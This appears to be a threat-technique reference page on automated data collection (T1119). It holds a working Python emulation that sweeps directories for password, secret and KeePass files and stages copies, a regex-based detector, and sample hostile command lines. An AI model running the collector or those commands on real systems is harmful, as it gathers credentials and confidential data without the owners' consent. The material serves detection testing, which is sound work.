T1119: Automated Collection
Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals.
In cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.
This functionality could also be built into remote access tools.
This technique may incorporate use of other techniques such as File and Directory Discovery and Lateral Tool Transfer to identify and move files, as well as Cloud Service Dashboard and Cloud Storage Object Discovery to identify resources in cloud environments.
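The following is an added example, not code from the original page or from any adversary tooling it references: a minimal emulation of the technique for testing detections in a lab. It walks a directory tree, selects files by extension, name pattern and modification time (the "set criteria" described above), copies them into a staging directory and returns a manifest of what it took, optionally repeating the sweep at a fixed interval. The extensions, name patterns, thresholds and sample files are assumptions constructed for the demo.

```python
"""
Added example (not from the original page): a lab emulation of T1119.
Walks a tree, selects files by extension / name pattern / mtime, copies
them to a staging directory and returns a manifest. Run it only against
data you own. Criteria and sample data below are assumptions for the demo.
"""
import fnmatch
import os
import shutil
import tempfile
import time
from pathlib import Path

# Criteria a collection script typically encodes (assumed for the demo).
DEFAULT_EXTENSIONS = {".docx", ".xlsx", ".pdf", ".txt"}
DEFAULT_NAME_PATTERNS = ("*password*", "*secret*", "*confidential*", "*.kdbx")


def matches_criteria(path, extensions, name_patterns, modified_since):
    """True if the file fits the extension/name criteria and the time window."""
    name = path.name.lower()
    ext_ok = path.suffix.lower() in extensions
    name_ok = any(fnmatch.fnmatch(name, pattern) for pattern in name_patterns)
    if not (ext_ok or name_ok):
        return False
    # Incremental sweeps only take files changed since the previous pass.
    if modified_since is not None and path.stat().st_mtime < modified_since:
        return False
    return True


def collect(root, staging, extensions=DEFAULT_EXTENSIONS,
            name_patterns=DEFAULT_NAME_PATTERNS, modified_since=None,
            max_bytes=50 * 1024 * 1024):
    """Copy every matching file under root into staging, preserving the
    relative path, and return the sorted list of relative paths taken."""
    root = Path(root).resolve()
    staging = Path(staging).resolve()
    staging.mkdir(parents=True, exist_ok=True)
    manifest = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for filename in filenames:
            src = Path(dirpath) / filename
            # Never re-collect the staging area if it lives under root.
            if staging in src.parents:
                continue
            try:
                if not matches_criteria(src, extensions, name_patterns, modified_since):
                    continue
                if src.stat().st_size > max_bytes:  # skip large media/binaries
                    continue
            except OSError:
                continue  # unreadable or vanished file: move on silently
            rel = src.relative_to(root)
            dst = staging / rel
            dst.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(src, dst)
            manifest.append(rel.as_posix())
    return sorted(manifest)


def sweep_on_interval(root, staging, interval_seconds, rounds, **criteria):
    """Repeat the sweep at a fixed interval; after the first pass only files
    modified since the previous pass are taken. Returns one manifest per pass."""
    manifests = []
    last_pass = None
    for i in range(rounds):
        manifests.append(collect(root, staging, modified_since=last_pass, **criteria))
        last_pass = time.time()
        if i < rounds - 1:
            time.sleep(interval_seconds)
    return manifests


def demo(**criteria):
    """Build a constructed sample share in a temp dir, sweep it once with the
    given criteria and return the manifest (the temp dir is removed afterwards)."""
    base = Path(tempfile.mkdtemp(prefix="t1119_"))
    samples = {                               # constructed sample data
        "finance/q3_report.xlsx": b"numbers",
        "hr/offer_letter.docx": b"terms",
        "it/passwords.txt": b"hunter2",        # taken by document extension
        "it/notes.md": b"nothing of note",     # matches neither criterion
        "it/vault.kdbx": b"\x03\xd9\xa2\x9a",  # taken by name pattern
        "media/logo.png": b"\x89PNG",          # matches neither criterion
    }
    for rel, content in samples.items():
        target = base / "share" / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(content)
    try:
        return collect(base / "share", base / "staging", **criteria)
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The staging directory mirrors the source tree, which is what a later archive-and-exfiltrate step expects; the `modified_since` window is what turns a one-off sweep into the timed, incremental collection the technique describes. Seeding a lab host with a tree like the one in `demo()` and running the sweep gives the file-access and command-execution telemetry against which the detections below can be checked.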
Positive Technologies products that cover the technique
MaxPatrol SIEM knowledge base
vsphere_suspicious_user_activity: PT-CR-518: Mass_downloading_files_of_critical_VM: Files from multiple security-critical virtual machines are downloaded
hacking_tools: PT-CR-2244: SOAPHound_Usage: SOAPHound was used, which is a tool that collects Active Directory data via the Active Directory Web Services (ADWS) protocol
pt_application_firewall: PT-CR-640: Web_Automation_Tool: The use of software for automation of requests to web services
Detection
ID | Data source and component | Description
---|---|---
DS0012 | Script: Script Execution | Monitor for attempts to enable script execution on a system. On hosts where scripts are not normally used but are enabled, scripts running outside patching cycles or other administrative work are suspicious. Capture scripts from the file system where possible to determine their actions and intent.
DS0022 | File: File Access | Monitor for unexpected access to user documents and media (e.g., .pdf, .docx, .jpg) that may indicate collection of internal data, in particular many such files read in quick succession by a single process.
DS0017 | Command: Command Execution | Monitor executed commands and arguments for actions that could be taken to collect internal data, such as recursive directory enumeration combined with file-type or name filters and copy or archive operations.
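As an added example for the Command Execution data source (not part of the original page or of any product listed above), the logic below scores process command lines by the building blocks of automated collection: recursive enumeration, file-type or name filters, copy/archive staging, timed repetition and bulk cloud pulls. It alerts when enough of them appear together, so that a lone recursive copy tool stays below the threshold. The indicator regexes, the alert threshold, the log format and the log lines are assumptions constructed for the demo and would be tuned against a real environment's baseline.

```python
"""
Added example (not from the original page): scoring of process command
lines for the building blocks of automated collection. Indicator patterns,
threshold and the sample events are assumptions constructed for the demo.
"""
import re

# Indicator categories and the command-line patterns that evidence them
# (matched case-insensitively). Assumed indicator set; tune to your baseline.
INDICATORS = {
    "enumerate": [
        r"\b(?:Get-ChildItem|gci)\b.*\s-Recurse\b",
        r"\bdir\b.*\s/s\b",
        r"\bforfiles\b.*\s/s\b",
        r"\bfind\s+\S+.*\s-type\s+f\b",
        r"\b(?:robocopy|xcopy)\b.*\s/[se]\b",
    ],
    "filter": [
        r"-(?:Include|Filter|name|iname)\s+[\"']?\*\.(?:docx?|xlsx?|pptx?|pdf|txt|kdbx)",
        r"/m\s+\*\.\w+",                      # forfiles /m *.pdf
    ],
    "stage": [
        r"\b(?:Copy-Item|Compress-Archive)\b",
        r"\b(?:copy|xcopy|robocopy)\b",
        r"\b7z\s+a\b", r"\brar\s+a\b", r"\btar\s+-?c", r"\bcp\s+-r",
    ],
    "interval": [
        r"\bwhile\s*\(\s*\$true\s*\)", r"\bStart-Sleep\b",
        r"\bschtasks\b.*/create", r"\bcrontab\b", r"\bsleep\s+\d+",
    ],
    "cloud_bulk": [
        r"\baws\s+s3\s+(?:sync\b|cp\b.*--recursive)",
        r"\bgsutil\b.*\bcp\s+-r", r"\baz\s+storage\s+blob\s+download-batch",
        r"\brclone\s+(?:copy|sync)\b",
    ],
}

# Constructed process-creation events: (timestamp, host, user, command line).
SAMPLE_EVENTS = [
    ("2024-05-02T10:14:03Z", "WS01", "jdoe",
     r'powershell.exe -nop -w hidden -c "Get-ChildItem C:\Users -Recurse -Include *.docx,*.xlsx,*.pdf | Copy-Item -Destination C:\Users\Public\stage"'),
    ("2024-05-02T10:20:41Z", "WS01", "jdoe",
     r'cmd.exe /c forfiles /p C:\Users /s /m *.pdf /c "cmd /c copy @path \\10.0.0.5\share"'),
    ("2024-05-02T11:02:17Z", "BUILD02", "svc_ci",
     r"aws s3 sync s3://corp-finance-backups ./dump --quiet"),
    ("2024-05-02T11:30:00Z", "FS01", "backup",
     r'powershell.exe -c "while($true){ Get-ChildItem D:\ -Recurse -Filter *.xlsx | Compress-Archive -DestinationPath C:\Temp\out.zip; Start-Sleep -Seconds 3600 }"'),
    ("2024-05-02T11:31:09Z", "WS01", "jdoe",
     r'powershell.exe -c "Get-Process | Out-File C:\Temp\procs.txt"'),          # benign
    ("2024-05-02T11:45:55Z", "BUILD02", "svc_ci",
     r"robocopy D:\Builds \\buildsrv\drop /E /R:1"),                              # benign bulk copy
]
# Tab-separated log lines as a SIEM export might deliver them (constructed).
SAMPLE_LOG = ["\t".join(event) for event in SAMPLE_EVENTS]


def classify(command_line):
    """Return the set of indicator categories present in a command line."""
    return {category for category, patterns in INDICATORS.items()
            if any(re.search(p, command_line, re.IGNORECASE) for p in patterns)}


def assess(command_line):
    """Score one command line and decide whether it should alert."""
    hits = classify(command_line)
    # Alert on enumerate+filter+stage style chains or any bulk cloud pull;
    # a copy tool with a recursive switch but no filter stays below the bar.
    alert = len(hits) >= 3 or "cloud_bulk" in hits
    return {"categories": sorted(hits), "score": len(hits), "alert": alert}


def scan(log_lines):
    """Parse tab-separated events and attach an assessment to each."""
    findings = []
    for line in log_lines:
        ts, host, user, cmd = line.split("\t", 3)
        finding = assess(cmd)
        finding.update({"ts": ts, "host": host, "user": user, "command_line": cmd})
        findings.append(finding)
    return findings


def alerts(log_lines):
    """Only the events that crossed the threshold."""
    return [f for f in scan(log_lines) if f["alert"]]


if __name__ == "__main__":
    for f in alerts(SAMPLE_LOG):
        print(f["ts"], f["host"], f["user"], f["categories"], f["command_line"][:60])
```

The categories map directly onto the technique description: enumeration plus a type filter plus a copy or archive step is the scripted search-and-copy, the `interval` indicators are the "specific time intervals", and `cloud_bulk` covers the CLI and API paths in cloud environments. Scoring by category rather than by a single signature keeps the rule robust to renamed tools, while the threshold keeps ordinary recursive copies from paging anyone.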
Mitigation
ID | Name | Description
---|---|---
M1029 | Remote Data Storage | Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means.
M1041 | Encrypt Sensitive Information | Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. Encrypted documents that are protected by a password should use strong passwords so that collected copies resist offline cracking through Brute Force techniques.